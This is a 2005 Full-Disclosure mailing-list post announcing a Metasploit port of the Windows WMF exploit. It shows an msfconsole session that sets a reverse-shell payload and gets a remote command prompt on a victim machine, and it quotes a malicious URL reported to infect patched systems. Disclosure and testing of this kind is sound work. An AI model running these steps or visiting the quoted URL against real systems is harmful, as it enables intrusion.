[Full-disclosure] Someone wasted a nice bug on spyware...

In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded

I ported the exploit to the Metasploit Framework in case anyone wants to
test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>


On Tuesday 27 December 2005 14:20, noemailpls@xxxxxxxxxxxxx wrote:
> Warning the following URL successfully exploited a fully patched
> windows xp system with a freshly updated norton anti virus.
>
> unionseek.com/d/t1/wmf_exp.htm
>
> The url runs a .wmf and executes the virus, f-secure will pick up the
> virus norton will not.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Re: Is this a new exploit?
    ... Available from 'msfupdate' for MSF users, ... Microsoft Windows XP ... > windows xp system with a freshly updated norton anti virus. ...
    (Bugtraq)
  • Re: strange new virus
    ... If someone wrote a little piece of arbitrary code saying to "use this file to see this drive properly" or something and point to a hidden .exe on the flash then its possible simply plugging it in can infect a PC. ... Another thing you may check is ask whoever plugged in the drive if a window appeared asking to open the folder, play the audio, play the video, you know the standard window autoplay window that pops up, they could have possibly clicked on something in that, that triggered an infection. ... There was a virus threat to Windows in that one could be hidden and ran from an image file using its macros, but CAD files weren't affected by this, doubt this is the case. ...
    (Focus-Microsoft)
  • RE: Invalid handle error
    ... I have exactly the same problem as Brendan. ... protection and firewall and Microsoft Windows XP updates are automatic. ... virus scan ran just hours before the problem appeared and nothing was found. ...
    (microsoft.public.security.virus)
  • Re: Mac OS X virus (or trojan) in the wild
    ... "Mac Rumors reports on what may be the first virus to affect OS X ... The virus is said to also spread via Bon Jour instant messaging." ... apps) and in the modern internet-era sense (spreads to other machines ... Spotlight) so whenever these apps are run, they execute the malware, ...
    (comp.sys.mac.advocacy)
  • Re: Mac OS X virus (or trojan) in the wild
    ... "Mac Rumors reports on what may be the first virus to affect OS X ... The virus is said to also spread via Bon Jour instant messaging." ... apps) and in the modern internet-era sense (spreads to other machines ... Spotlight) so whenever these apps are run, they execute the malware, ...
    (comp.sys.mac.advocacy)